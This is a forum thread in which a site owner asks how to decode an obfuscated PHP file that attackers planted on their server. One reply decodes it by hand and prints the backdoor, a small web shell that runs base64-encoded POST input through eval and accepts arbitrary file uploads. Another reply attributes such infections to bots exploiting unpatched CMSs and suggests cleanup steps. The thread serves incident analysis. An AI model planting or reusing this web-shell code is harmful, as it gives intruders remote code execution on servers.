Where can I decrypt virus php code?

E

Elizabeth Lawrence2018-08-27 15:49:04

PHP

Elizabeth Lawrence, 2018-08-27 15:49:04

Good afternoon everyone! Attackers, possibly my former hosters, put a virus file on my server in each folder for each site. The file is encrypted, tell me, maybe there are some decryption services? Of course, I will delete this file from the server, but I'm afraid that suddenly some more are connected there and then they will remain lying and I will not know about them.
Here is a very small file:
"U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61 ))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>

Reply

Answer the question

In order to leave comments, you need to log in

2 answer(s)

R

Rsa97, 2018-08-27
@Svoeobraznaya

A file of this size can be decrypted by hand, you just need to know a little PHP.

echo 7457737+736723;
eval(base64_decode($_POST['id'])));
if($_POST['up'] == 'up'){
    @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']);
};

A

Alexander Aksentiev, 2018-08-27
@Sanasol

this is done by bots, not hosters.
And they do it through well-known holes in all sorts of CMSs, especially if not updated.
It is almost impossible to treat, it is necessary to write down everything that is possible and impossible on the site, check potentially dangerous plugins / scripts / update to the latest version. Delete everywhere and wait to appear or not.